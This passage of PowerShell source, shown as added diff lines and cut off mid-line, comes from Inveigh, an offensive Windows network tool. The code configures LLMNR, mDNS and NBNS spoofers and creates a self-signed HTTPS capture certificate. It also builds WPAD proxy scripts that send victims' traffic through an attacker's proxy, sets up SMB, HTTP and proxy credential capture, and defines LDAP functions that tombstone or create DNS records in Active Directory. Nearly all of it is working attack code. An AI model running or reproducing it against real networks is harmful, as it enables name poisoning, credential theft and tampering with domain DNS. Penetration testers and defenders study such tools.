$inveigh.output_queue.Add("[+] ADIDNS Hosts Ignore = " + ($ADIDNSHostsIgnore -join ",")) > $null + $inveigh.output_queue.Add("[+] ADIDNS Domain Controller = $ADIDNSDomainController") > $null + $inveigh.output_queue.Add("[+] ADIDNS Domain = $ADIDNSDomain") > $null + $inveigh.output_queue.Add("[+] ADIDNS Forest = $ADIDNSForest") > $null + $inveigh.output_queue.Add("[+] ADIDNS TTL = $ADIDNSTTL") > $null + $inveigh.output_queue.Add("[+] ADIDNS Zone = $ADIDNSZone") > $null + + if($ADIDNSCleanup -eq 'Y') + { + $inveigh.output_queue.Add("[+] ADIDNS Cleanup = Enabled") > $null + } + else + { + $inveigh.output_queue.Add("[+] ADIDNS Cleanup = Disabled") > $null + } + + if($ADIDNS -eq 'Combo') + { + $inveigh.request_table_updated = $true + } + +} +else +{ + $inveigh.output_queue.Add("[+] ADIDNS Spoofer = Disabled") > $null +} + +if($LLMNR -eq 'Y') +{ + + if($elevated_privilege -or !$LLMNR_port_check) + { + $inveigh.output_queue.Add("[+] LLMNR Spoofer = Enabled") > $null + $inveigh.output_queue.Add("[+] LLMNR TTL = $LLMNRTTL Seconds") > $null + } + else + { + $LLMNR = "N" + $inveigh.output_queue.Add("[-] LLMNR Spoofer Disabled Due To In Use Port 5355") > $null + } + +} +else +{ + $inveigh.output_queue.Add("[+] LLMNR Spoofer = Disabled") > $null + $LLMNR_response_message = "[spoofer disabled]" +} + +if($mDNS -eq 'Y') +{ + + if($elevated_privilege -or !$mDNS_port_check) + { + $mDNSTypes_output = $mDNSTypes -join "," + + if($mDNSTypes.Count -eq 1) + { + $inveigh.output_queue.Add("[+] mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null + } + else + { + $inveigh.output_queue.Add("[+] mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null + } + + $inveigh.output_queue.Add("[+] mDNS TTL = $mDNSTTL Seconds") > $null + } + else + { + $mDNS = "N" + $inveigh.output_queue.Add("[-] mDNS Spoofer Disabled Due To In Use Port 5353") > $null + } + +} +else +{ + $inveigh.output_queue.Add("[+] mDNS Spoofer = Disabled") > $null + $mDNS_response_message = "[spoofer disabled]" +} + +if($NBNS -eq 'Y') +{ + $NBNSTypes_output = $NBNSTypes -join "," + + if($NBNSTypes.Count -eq 1) + { + $inveigh.output_queue.Add("[+] NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null + } + else + { + $inveigh.output_queue.Add("[+] NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null + } + +} +else +{ + $inveigh.output_queue.Add("[+] NBNS Spoofer = Disabled") > $null + $NBNS_response_message = "[spoofer disabled]" +} + +if($NBNSBruteForce -eq 'Y') +{ + $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null + $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null + $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null + + if($NBNSBruteForcePause) + { + $inveigh.output_queue.Add("[+] NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null + } + +} + +if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y') +{ + $inveigh.output_queue.Add("[+] NBNS TTL = $NBNSTTL Seconds") > $null +} + +if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.output_queue.Add("[+] Spoofer Learning = Enabled") > $null + + if($SpooferLearningDelay -eq 1) + { + $inveigh.output_queue.Add("[+] Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null + } + elseif($SpooferLearningDelay -gt 1) + { + $inveigh.output_queue.Add("[+] Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null + } + + if($SpooferLearningInterval -eq 1) + { + $inveigh.output_queue.Add("[+] Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null + } + elseif($SpooferLearningInterval -eq 0) + { + $inveigh.output_queue.Add("[+] Spoofer Learning Interval = Disabled") > $null + } + elseif($SpooferLearningInterval -gt 1) + { + $inveigh.output_queue.Add("[+] Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null + } + +} + +if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.output_queue.Add("[+] Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null +} + +if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.output_queue.Add("[+] Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null +} + +if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.output_queue.Add("[+] Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null +} + +if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.output_queue.Add("[+] Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null +} + +if($SpooferRepeat -eq 'N') +{ + $inveigh.spoofer_repeat = $false + $inveigh.output_queue.Add("[+] Spoofer Repeating = Disabled") > $null +} +else +{ + $inveigh.spoofer_repeat = $true +} + +if($SMB -eq 'Y' -and $elevated_privilege) +{ + $inveigh.output_queue.Add("[+] SMB Capture = Enabled") > $null +} +else +{ + $inveigh.output_queue.Add("[+] SMB Capture = Disabled") > $null +} + +if($HTTP -eq 'Y') +{ + + if($HTTP_port_check) + { + $HTTP = "N" + $inveigh.output_queue.Add("[-] HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null + } + else + { + + if($HTTPIP -ne '0.0.0.0') + { + $inveigh.output_queue.Add("[+] HTTP IP = $HTTPIP") > $null + } + + if($HTTPPort -ne 80) + { + $inveigh.output_queue.Add("[+] HTTP Port = $HTTPPort") > $null + } + + $inveigh.output_queue.Add("[+] HTTP Capture = Enabled") > $null + } + +} +else +{ + $inveigh.output_queue.Add("[+] HTTP Capture = Disabled") > $null +} + +if($HTTPS -eq 'Y') +{ + + if($HTTPS_port_check) + { + $HTTPS = "N" + $inveigh.HTTPS = $false + $inveigh.output_queue.Add("[-] HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null + } + else + { + + try + { + $inveigh.certificate_issuer = $HTTPSCertIssuer + $inveigh.certificate_CN = $HTTPSCertSubject + $inveigh.output_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null + $inveigh.output_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null + $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer}) + + if(!$certificate_check) + { + # credit to subTee for cert creation code from Interceptor + $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName" + $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) + $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName" + $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) + $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey" + $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider" + $certificate_key.KeySpec = 2 + $certificate_key.Length = 2048 + $certificate_key.MachineContext = 1 + $certificate_key.Create() + $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId" + $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1") + $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1" + $certificate_enhanced_key_usage_OID.Add($certificate_server_auth_OID) + $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage" + $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID) + $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate" + $certificate.InitializeFromPrivateKey(2,$certificate_key,"") + $certificate.Subject = $certificate_distinguished_name + $certificate.Issuer = $certificate_issuer_distinguished_name + $certificate.NotBefore = (Get-Date).AddDays(-271) + $certificate.NotAfter = $certificate.NotBefore.AddDays(824) + $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId + $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256") + $certificate.HashAlgorithm = $certificate_hash_algorithm_OID + $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension) + $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints" + $certificate_basic_constraints.InitializeEncode("true",1) + $certificate.X509Extensions.Add($certificate_basic_constraints) + $certificate.Encode() + $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment" + $certificate_enrollment.InitializeFromRequest($certificate) + $certificate_data = $certificate_enrollment.CreateRequest(0) + $certificate_enrollment.InstallResponse(2,$certificate_data,0,"") + $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer}) + } + else + { + + if($HTTPSForceCertDelete -eq 'Y') + { + $inveigh.HTTPS_force_certificate_delete = $true + } + + $inveigh.HTTPS_existing_certificate = $true + $inveigh.output_queue.Add("[+] HTTPS Capture = Using Existing Certificate") > $null + } + + $inveigh.HTTPS = $true + + if($HTTPIP -ne '0.0.0.0') + { + $inveigh.output_queue.Add("[+] HTTPS IP = $HTTPIP") > $null + } + + if($HTTPSPort -ne 443) + { + $inveigh.output_queue.Add("[+] HTTPS Port = $HTTPSPort") > $null + } + + $inveigh.output_queue.Add("[+] HTTPS Capture = Enabled") > $null + + } + catch + { + $HTTPS = "N" + $inveigh.HTTPS = $false + $inveigh.output_queue.Add("[-] HTTPS Capture Disabled Due To Certificate Error") > $null + } + + } + +} +else +{ + $inveigh.output_queue.Add("[+] HTTPS Capture = Disabled") > $null +} + +if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') +{ + $inveigh.output_queue.Add("[+] HTTP/HTTPS Authentication = $HTTPAuth") > $null + + if($HTTPDir -and !$HTTPResponse) + { + $inveigh.output_queue.Add("[+] HTTP/HTTPS Directory = $HTTPDir") > $null + + if($HTTPDefaultFile) + { + $inveigh.output_queue.Add("[+] HTTP/HTTPS Default Response File = $HTTPDefaultFile") > $null + } + + if($HTTPDefaultEXE) + { + $inveigh.output_queue.Add("[+] HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE") > $null + } + + } + + if($HTTPResponse) + { + $inveigh.output_queue.Add("[+] HTTP/HTTPS Response = Enabled") > $null + } + + if($HTTPResponse -or $HTTPDir -and $HTTPContentType -ne 'html/text') + { + $inveigh.output_queue.Add("[+] HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null + } + + if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') + { + $inveigh.output_queue.Add("[+] Basic Authentication Realm = $HTTPBasicRealm") > $null + } + + if($Proxy -eq 'Y') + { + + if($proxy_port_check) + { + $Proxy = "N" + $inveigh.output_queue.Add("[-] Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null + } + else + { + $inveigh.output_queue.Add("[+] Proxy Capture = Enabled") > $null + $inveigh.output_queue.Add("[+] Proxy Port = $ProxyPort") > $null + $inveigh.output_queue.Add("[+] Proxy Authentication = $ProxyAuth") > $null + $ProxyPortFailover = $ProxyPort + 1 + $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) + + if($ProxyIgnore.Count -gt 0) + { + $inveigh.output_queue.Add("[+] Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null + } + + if($ProxyIP -eq '0.0.0.0') + { + $proxy_WPAD_IP = $IP + } + else + { + $proxy_WPAD_IP = $ProxyIP + } + + if($WPADIP -and $WPADPort) + { + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $WPADIP`:$WPADPort; DIRECT`";}" + } + else + { + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_wpad_IP`:$ProxyPortFailover; DIRECT`";}" + } + + } + + } + + $inveigh.output_queue.Add("[+] WPAD Authentication = $WPADAuth") > $null + + if($WPADAuth -like "NTLM*") + { + $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()}) + + if($WPADAuthIgnore.Count -gt 0) + { + $inveigh.output_queue.Add("[+] WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null + } + + } + + if($WPADDirectHosts) + { + foreach($WPAD_direct_host in $WPADDirectHosts) + { + $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' + } + + $inveigh.output_queue.Add("[+] WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null + } + + if($WPADResponse -and $Proxy -eq 'N') + { + $inveigh.output_queue.Add("[+] WPAD Custom Response = Enabled") > $null + } + elseif($WPADResponse -and $Proxy -eq 'Y') + { + $inveigh.output_queue.Add("[+] WPAD Proxy Response = Enabled") > $null + + if($WPADIP -and $WPADPort) + { + $inveigh.output_queue.Add("[+] WPAD Failover = $WPADIP`:$WPADPort") > $null + } + + } + elseif($WPADIP -and $WPADPort) + { + $inveigh.output_queue.Add("[+] WPAD Response = Enabled") > $null + $inveigh.output_queue.Add("[+] WPAD = $WPADIP`:$WPADPort") > $null + + if($WPADDirectHosts) + { + + foreach($WPAD_direct_host in $WPADDirectHosts) + { + $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' + } + + $WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + $inveigh.output_queue.Add("[+] WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null + } + else + { + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $WPADIP`:$WPADPort; DIRECT`";}" + } + + } + elseif($WPADDirectFile -eq 'Y') + { + $inveigh.output_queue.Add("[+] WPAD Default Response = Enabled") > $null + $WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}" + } + + if($Challenge) + { + $inveigh.output_queue.Add("[+] NTLM Challenge = $Challenge") > $null + } + +} + +if($MachineAccounts -eq 'N') +{ + $inveigh.output_queue.Add("[+] Machine Account Capture = Disabled") > $null + $inveigh.machine_accounts = $false +} +else +{ + $inveigh.output_queue.Add("[+] Machine Account Capture = Enabled") > $null + $inveigh.machine_accounts = $true +} + +if($ConsoleOutput -ne 'N') +{ + + if($ConsoleOutput -ne 'N') + { + + if($ConsoleOutput -eq 'Y') + { + $inveigh.output_queue.Add("[+] Console Output = Full") > $null + } + else + { + $inveigh.output_queue.Add("[+] Console Output = $ConsoleOutput") > $null + } + + } + + $inveigh.console_output = $true + + if($ConsoleStatus -eq 1) + { + $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minute") > $null + } + elseif($ConsoleStatus -gt 1) + { + $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minutes") > $null + } + +} +else +{ + + if($inveigh.tool -eq 1) + { + $inveigh.output_queue.Add("[+] Console Output Disabled Due To External Tool Selection") > $null + } + else + { + $inveigh.output_queue.Add("[+] Console Output = Disabled") > $null + } + +} + +if($ConsoleUnique -eq 'Y') +{ + $inveigh.console_unique = $true +} +else +{ + $inveigh.console_unique = $false +} + +if($FileOutput -eq 'Y') +{ + $inveigh.output_queue.Add("[+] File Output = Enabled") > $null + $inveigh.output_queue.Add("[+] Output Directory = $output_directory") > $null + $inveigh.file_output = $true +} +else +{ + $inveigh.output_queue.Add("[+] File Output = Disabled") > $null +} + +if($FileUnique -eq 'Y') +{ + $inveigh.file_unique = $true +} +else +{ + $inveigh.file_unique = $false +} + +if($LogOutput -eq 'Y') +{ + $inveigh.log_output = $true +} +else +{ + $inveigh.log_output = $false +} + +if($RunCount) +{ + $inveigh.output_queue.Add("[+] Run Count = $RunCount") > $null +} + +if($RunTime -eq 1) +{ + $inveigh.output_queue.Add("[+] Run Time = $RunTime Minute") > $null +} +elseif($RunTime -gt 1) +{ + $inveigh.output_queue.Add("[+] Run Time = $RunTime Minutes") > $null +} + +if($ShowHelp -eq 'Y') +{ + $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop") > $null + + if($inveigh.console_output) + { + $inveigh.output_queue.Add("[*] Press any key to stop console output") > $null + } + +} + +while($inveigh.output_queue.Count -gt 0) +{ + + switch -Wildcard ($inveigh.output_queue[0]) + { + + {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + { + + if($inveigh.status_output -and $inveigh.output_stream_only) + { + Write-Output($inveigh.output_queue[0] + $inveigh.newline) + } + elseif($inveigh.status_output) + { + Write-Warning($inveigh.output_queue[0]) + } + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null + } + + if($inveigh.log_output) + { + $inveigh.log.Add($inveigh.output_queue[0]) > $null + } + + $inveigh.output_queue.RemoveAt(0) + } + + default + { + + if($inveigh.status_output -and $inveigh.output_stream_only) + { + Write-Output($inveigh.output_queue[0] + $inveigh.newline) + } + elseif($inveigh.status_output) + { + Write-Output($inveigh.output_queue[0]) + } + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null + } + + if($inveigh.log_output) + { + $inveigh.log.Add($inveigh.output_queue[0]) > $null + } + + $inveigh.output_queue.RemoveAt(0) + } + + } + +} + +$inveigh.status_output = $false + +#endregion +#region begin script blocks + +# Shared Basic Functions ScriptBlock +$shared_basic_functions_scriptblock = +{ + + function Get-UInt16DataLength + { + param ([Int]$Start,[Byte[]]$Data) + + $data_length = [System.BitConverter]::ToUInt16($Data[$Start..($Start + 1)],0) + + return $data_length + } + + function Get-UInt32DataLength + { + param ([Int]$Start,[Byte[]]$Data) + + $data_length = [System.BitConverter]::ToUInt32($Data[$Start..($Start + 3)],0) + + return $data_length + } + + function Convert-DataToString + { + param ([Int]$Start,[Int]$Length,[Byte[]]$Data) + + $string_data = [System.BitConverter]::ToString($Data[$Start..($Start + $Length - 1)]) + $string_data = $string_data -replace "-00","" + $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $string_extract = New-Object System.String ($string_data,0,$string_data.Length) + + return $string_extract + } + + function Convert-DataToUInt16($field) + { + [Array]::Reverse($field) + return [System.BitConverter]::ToUInt16($field,0) + } + + function Convert-DataToUInt32($field) + { + [Array]::Reverse($field) + return [System.BitConverter]::ToUInt32($field,0) + } + + function Get-SpooferResponseMessage + { + param ([String]$QueryString,[String]$Type,[String]$mDNSType) + + $response_type = "[+]" + + if($SpooferHostsReply -and $SpooferHostsReply -notcontains $QueryString) + { + $response_message = "[$QueryString not on reply list]" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $QueryString) + { + $response_message = "[$QueryString is on ignore list]" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $response_message = "[$source_IP not on reply list]" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $response_message = "[$source_IP is on ignore list]" + } + elseif($inveigh.valid_host_list -contains $query_string) + { + $response_message = "[$query_string is a valid host]" + } + elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString) + { + $response_message = "[previous $source_IP capture]" + } + elseif($source_IP.IPAddressToString -eq $IP) + { + $response_message = "[local request ignored]" + } + elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay) + { + $response_message = ": " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts" + } + elseif($Type -ne 'mDNS' -and $destination_IP.IPAddressToString -eq $IP) + { + $response_message = "[possible ResponderGuard request ignored]" + $response_type = "[!]" + } + elseif($Type -eq 'NBNS' -and $NBNSTypes -notcontains $NBNS_query_type) + { + $response_message = "[NBNS type disabled]" + } + elseif($Type -eq 'NBNS' -and $QueryString.Trim() -eq '*') + { + $response_message = "[NBSTAT request]" + } + elseif($Type -eq 'mDNS' -and $mDNSType -and $mDNSTypes -notcontains $mDNSType) + { + $response_message = "[mDNS type disabled]" + } + elseif(@($inveigh.request_table.$QueryString | Where-Object {$_ -match $source_IP.IPAddressToString}).Count -le $SpooferThresholdHost) + { + $response_message = "[SpooferThresholdHost >= $(@($inveigh.request_table.$QueryString | Where-Object {$_ -match $source_IP.IPAddressToString}).Count)]" + } + elseif(@($inveigh.request_table.$QueryString | Sort-Object | Get-Unique).Count -le $SpooferThresholdNetwork) + { + $response_message = "[SpooferThresholdNetwork >= $(@($inveigh.request_table.$QueryString | Sort-Object | Get-Unique).Count)]" + } + elseif($QueryString -notmatch '[^\x00-\x7F]+') + { + $response_message = "[nonprintable characters]" + } + else + { + $response_message = "[something went wrong]" + $response_type = "[-]" + } + + return $response_type,$response_message + } + + function Get-NBNSQueryType([String]$NBNSQueryType) + { + + switch ($NBNSQueryType) + { + + '41-41' + { + $NBNS_query_type = "00" + } + + '41-44' + { + $NBNS_query_type = "03" + } + + '43-41' + { + $NBNS_query_type = "20" + } + + '42-4C' + { + $NBNS_query_type = "1B" + } + + '42-4D' + { + $NBNS_query_type = "1C" + } + + '42-4E' + { + $NBNS_query_type = "1D" + } + + '42-4F' + { + $NBNS_query_type = "1E" + } + + } + + return $NBNS_query_type + } + + function ConvertFrom-PacketOrderedDictionary + { + param($packet_ordered_dictionary) + + foreach($field in $packet_ordered_dictionary.Values) + { + $byte_array += $field + } + + return $byte_array + } + + function New-RelayEnumObject + { + param ($IP,$Hostname,$Sessions,$AdministratorUsers,$AdministratorGroups,$Privileged,$Shares,$NetSessions,$NetSessionsMapped, + $LocalUsers,$SMB2,$Signing,$SMBServer,$Targeted,$Enumerate,$Execute) + + if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)} + if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)} + if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)} + if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)} + if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)} + if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)} + if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)} + if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)} + + $relay_object = New-Object PSObject + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumerate.Count + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2 + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumeration + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execution + + return $relay_object + } + + function Invoke-SessionUpdate + { + param ([String]$domain,[String]$username,[String]$hostname,[String]$IP) + + if($inveigh.domain_mapping_table.$domain) + { + $session = ($username + "@" + $inveigh.domain_mapping_table.$domain).ToUpper() + $hostname_full = ($hostname + "." + $inveigh.domain_mapping_table.$domain).ToUpper() + } + else + { + $session = $domain + "\" + $username + } + + for($i = 0;$i -lt $inveigh.enumerate.Count;$i++) + { + + if($inveigh.enumerate[$i].Hostname -eq $hostname_full -or $inveigh.enumerate[$i].IP -eq $IP) + { + + if(!$inveigh.enumerate[$i].Hostname) + { + $inveigh.enumerate[$target_index].Hostname = $hostname_full + } + + [Array]$session_list = $inveigh.enumerate[$i].Sessions + + if($inveigh.domain_mapping_table.$domain) + { + + for($j = 0;$j -lt $session_list.Count;$j++) + { + + if($session_list[$j] -like "$domain\*") + { + $session_username = ($session_list[$j].Split("\"))[1] + $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$domain + $session_list[$j] += $session_update + $inveigh.enumerate[$i].Sessions = $session_list + } + + } + + } + + if($session_list -notcontains $session) + { + $session_list += $session + $inveigh.enumerate[$i].Sessions = $session_list + } + + $target_updated = $true + break + } + + } + + if(!$target_updated) + { + $inveigh.enumerate.Add((New-RelayEnumObject -IP $IP -Hostname $hostname_full -Sessions $session)) > $null + } + + } + +} + +# ADIDNS Functions ScriptBlock +$ADIDNS_functions_scriptblock = +{ + + function Disable-ADIDNSNode + { + + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$true)][String]$Node, + [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones", + [parameter(Mandatory=$false)][String]$Zone, + [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential + ) + + $SOASerialNumberArray = New-SOASerialNumberArray -DomainController $DomainController -Zone $Zone + + $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition" + $DC_array = $Domain.Split(".") + + foreach($DC in $DC_array) + { + $distinguished_name += ",DC=$DC" + } + + if($Credential) + { + $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password) + } + else + { + $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name" + } + + $timestamp = [Int64](([datetime]::UtcNow.Ticks)-(Get-Date "1/1/1601").Ticks) + $timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($timestamp)) + $timestamp = $timestamp.Split("-") | ForEach-Object{[System.Convert]::ToInt16($_,16)} + + [Byte[]]$DNS_record = 0x08,0x00,0x00,0x00,0x05,0x00,0x00,0x00 + + $SOASerialNumberArray[0..3] + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $timestamp + + try + { + $directory_entry.InvokeSet('dnsRecord',$DNS_record) + $directory_entry.InvokeSet('dnsTombstoned',$true) + $directory_entry.SetInfo() + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] ADIDNS node $Node tombstoned in $Zone") > $null + } + catch + { + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + } + + if($directory_entry.Path) + { + $directory_entry.Close() + } + + } + + function Enable-ADIDNSNode + { + + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][String]$Data, + [parameter(Mandatory=$false)][String]$DistinguishedName, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$true)][String]$Node, + [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones", + [parameter(Mandatory=$false)][ValidateSet("A","AAAA","CNAME","DNAME","MX","NS","PTR","SRV","TXT")][String]$Type = "A", + [parameter(Mandatory=$false)][String]$Zone, + [parameter(Mandatory=$false)][Byte[]]$DNSRecord, + [parameter(Mandatory=$false)][Int]$Preference, + [parameter(Mandatory=$false)][Int]$Priority, + [parameter(Mandatory=$false)][Int]$Weight, + [parameter(Mandatory=$false)][Int]$Port, + [parameter(Mandatory=$false)][Int]$TTL = 600, + [parameter(Mandatory=$false)][Int32]$SOASerialNumber, + [parameter(Mandatory=$false)][Switch]$Static, + [parameter(Mandatory=$false)][Switch]$Tombstone, + [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential + ) + + $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition" + $DC_array = $Domain.Split(".") + + foreach($DC in $DC_array) + { + $distinguished_name += ",DC=$DC" + } + + [Byte[]]$DNSRecord = New-DNSRecordArray -Data $Data -DomainController $DomainController -TTL $TTL -Zone $Zone + + if($Credential) + { + $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password) + } + else + { + $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name" + } + + try + { + $directory_entry.InvokeSet('dnsRecord',$DNSRecord) + $directory_entry.SetInfo() + $success = $true + $inveigh.output_queue.Add("[!] [$(Get-Date 